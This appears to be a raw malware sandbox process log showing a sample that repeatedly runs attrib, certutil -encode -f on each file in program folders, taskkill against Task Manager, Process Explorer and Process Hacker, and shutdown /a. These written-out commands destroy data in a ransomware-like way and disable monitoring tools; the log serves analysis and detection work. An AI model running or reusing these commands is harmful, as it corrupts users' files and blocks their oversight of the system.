- Drops desktop.ini file(s)
PID:1512
-
-
C:\Windows\system32\certutil.execertutil -encode -f "StartShow.vsw" "StartShow.vsw".148495⤵PID:1908
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1564
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1940
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "TestRevoke.mp2v" "TestRevoke.mp2v".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1420
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1792
-
-
C:\Windows\system32\certutil.execertutil -encode -f "TestRevoke.mp2v" "TestRevoke.mp2v".148495⤵PID:1516
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:2036
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1352
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Uninstall Information" "Uninstall Information".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1164
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "UninstallRepair.eps" "UninstallRepair.eps".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:648
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
PID:1488
-
-
C:\Windows\system32\certutil.execertutil -encode -f "UninstallRepair.eps" "UninstallRepair.eps".148495⤵PID:1748
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:636
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:592
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "UnprotectShow.nfo" "UnprotectShow.nfo".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:520
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
PID:1764
-
-
C:\Windows\system32\certutil.execertutil -encode -f "UnprotectShow.nfo" "UnprotectShow.nfo".148495⤵PID:1592
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1928
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1820
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "UnpublishConvertTo.ico" "UnpublishConvertTo.ico".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1840
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops desktop.ini file(s)
PID:1812
-
-
C:\Windows\system32\certutil.execertutil -encode -f "UnpublishConvertTo.ico" "UnpublishConvertTo.ico".148495⤵PID:1880
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:436
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1560
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "VideoLAN" "VideoLAN".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1680
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Defender" "Windows Defender".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1664
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Journal" "Windows Journal".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1336
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Mail" "Windows Mail".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1440
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Media Player" "Windows Media Player".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1388
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows NT" "Windows NT".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1596
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Photo Viewer" "Windows Photo Viewer".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1848
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Portable Devices" "Windows Portable Devices".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1640
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Windows Sidebar" "Windows Sidebar".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:912
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7-zip.chm" "7-zip.chm".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1456
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1736
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7-zip.chm" "7-zip.chm".148495⤵PID:764
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:680
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1684
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7-zip.dll" "7-zip.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1672
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:852
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7-zip.dll" "7-zip.dll".148495⤵PID:944
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:556
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1088
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7-zip32.dll" "7-zip32.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:656
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1248
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7-zip32.dll" "7-zip32.dll".148495⤵PID:900
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1920
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1092
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7z.dll" "7z.dll".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1488
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1016
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7z.dll" "7z.dll".148495⤵PID:1832
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:828
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1688
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7z.exe" "7z.exe".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1764
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1656
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7z.exe" "7z.exe".148495⤵PID:1988
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1152
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1660
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7z.sfx" "7z.sfx".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1812
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1364
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7z.sfx" "7z.sfx".148495⤵PID:1624
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1732
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:316
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7zCon.sfx" "7zCon.sfx".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1680
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1664
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7zCon.sfx" "7zCon.sfx".148495⤵PID:1336
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1568
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1640
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7zFM.exe" "7zFM.exe".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1520
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1692
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7zFM.exe" "7zFM.exe".148495⤵PID:764
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1572
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1684
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "7zG.exe" "7zG.exe".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1696
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1452
-
-
C:\Windows\system32\certutil.execertutil -encode -f "7zG.exe" "7zG.exe".148495⤵PID:944
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1884
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1088
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "descript.ion" "descript.ion".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:328
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:692
-
-
C:\Windows\system32\certutil.execertutil -encode -f "descript.ion" "descript.ion".148495⤵PID:900
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:672
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1092
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "History.txt" "History.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1748
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1932
-
-
C:\Windows\system32\certutil.execertutil -encode -f "History.txt" "History.txt".148495⤵PID:1832
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1900
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1688
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Lang" "Lang".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1592
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "License.txt" "License.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1944
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1988
-
-
C:\Windows\system32\certutil.execertutil -encode -f "License.txt" "License.txt".148495⤵PID:964
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1928
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1764
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "readme.txt" "readme.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1892
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1624
-
-
C:\Windows\system32\certutil.execertutil -encode -f "readme.txt" "readme.txt".148495⤵PID:1964
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:760
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1812
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Uninstall.exe" "Uninstall.exe".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1440
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:1336
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Uninstall.exe" "Uninstall.exe".148495⤵PID:660
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1596
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1680
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "af.txt" "af.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1712
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:764
-
-
C:\Windows\system32\certutil.execertutil -encode -f "af.txt" "af.txt".148495⤵PID:1468
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1068
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1520
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "an.txt" "an.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1252
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:944
-
-
C:\Windows\system32\certutil.execertutil -encode -f "an.txt" "an.txt".148495⤵PID:1792
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1564
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1696
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ar.txt" "ar.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1352
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:900
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ar.txt" "ar.txt".148495⤵PID:1776
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:2036
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:328
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ast.txt" "ast.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:592
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:1832
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ast.txt" "ast.txt".148495⤵PID:1700
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1716
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1748
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "az.txt" "az.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1820
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
PID:816
-
-
C:\Windows\system32\certutil.execertutil -encode -f "az.txt" "az.txt".148495⤵PID:964
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1660
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1764
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ba.txt" "ba.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1560
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:436
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ba.txt" "ba.txt".148495⤵PID:1964
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:316
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1812
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "be.txt" "be.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1960
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1992
-
-
C:\Windows\system32\certutil.execertutil -encode -f "be.txt" "be.txt".148495⤵PID:660
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1640
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1680
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "bg.txt" "bg.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1512
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
PID:1464
-
-
C:\Windows\system32\certutil.execertutil -encode -f "bg.txt" "bg.txt".148495⤵PID:1468
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1456
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1520
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "bn.txt" "bn.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:556
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1476
-
-
C:\Windows\system32\certutil.execertutil -encode -f "bn.txt" "bn.txt".148495⤵PID:1792
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1088
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1696
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "br.txt" "br.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1164
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:1628
-
-
C:\Windows\system32\certutil.execertutil -encode -f "br.txt" "br.txt".148495⤵PID:1776
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:656
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:328
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "ca.txt" "ca.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:828
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:636
-
-
C:\Windows\system32\certutil.execertutil -encode -f "ca.txt" "ca.txt".148495⤵PID:1700
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1688
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1748
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "co.txt" "co.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:332
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
PID:520
-
-
C:\Windows\system32\certutil.execertutil -encode -f "co.txt" "co.txt".148495⤵PID:964
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1880
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1944
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "cs.txt" "cs.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1820
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
PID:436
-
-
C:\Windows\system32\certutil.execertutil -encode -f "cs.txt" "cs.txt".148495⤵PID:1460
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:760
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:940
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "cy.txt" "cy.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1560
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1992
-
-
C:\Windows\system32\certutil.execertutil -encode -f "cy.txt" "cy.txt".148495⤵PID:1888
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:788
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1440
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "da.txt" "da.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1960
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
- Views/modifies file attributes
PID:1464
-
-
C:\Windows\system32\certutil.execertutil -encode -f "da.txt" "da.txt".148495⤵PID:1616
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1452
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1712
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "de.txt" "de.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:764
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1548
-
-
C:\Windows\system32\certutil.execertutil -encode -f "de.txt" "de.txt".148495⤵PID:852
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:304
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1252
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "el.txt" "el.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:944
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1920
-
-
C:\Windows\system32\certutil.execertutil -encode -f "el.txt" "el.txt".148495⤵PID:1092
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:2036
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1352
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "en.ttt" "en.ttt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:900
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:648
-
-
C:\Windows\system32\certutil.execertutil -encode -f "en.ttt" "en.ttt".148495⤵PID:1728
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:572
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1488
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "eo.txt" "eo.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:744
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
PID:1748
-
-
C:\Windows\system32\certutil.execertutil -encode -f "eo.txt" "eo.txt".148495⤵PID:828
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1364
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1816
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "es.txt" "es.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1988
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:1944
-
-
C:\Windows\system32\certutil.execertutil -encode -f "es.txt" "es.txt".148495⤵PID:332
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1664
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1204
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "et.txt" "et.txt".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1624
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Drops file in Program Files directory
PID:1540
-
-
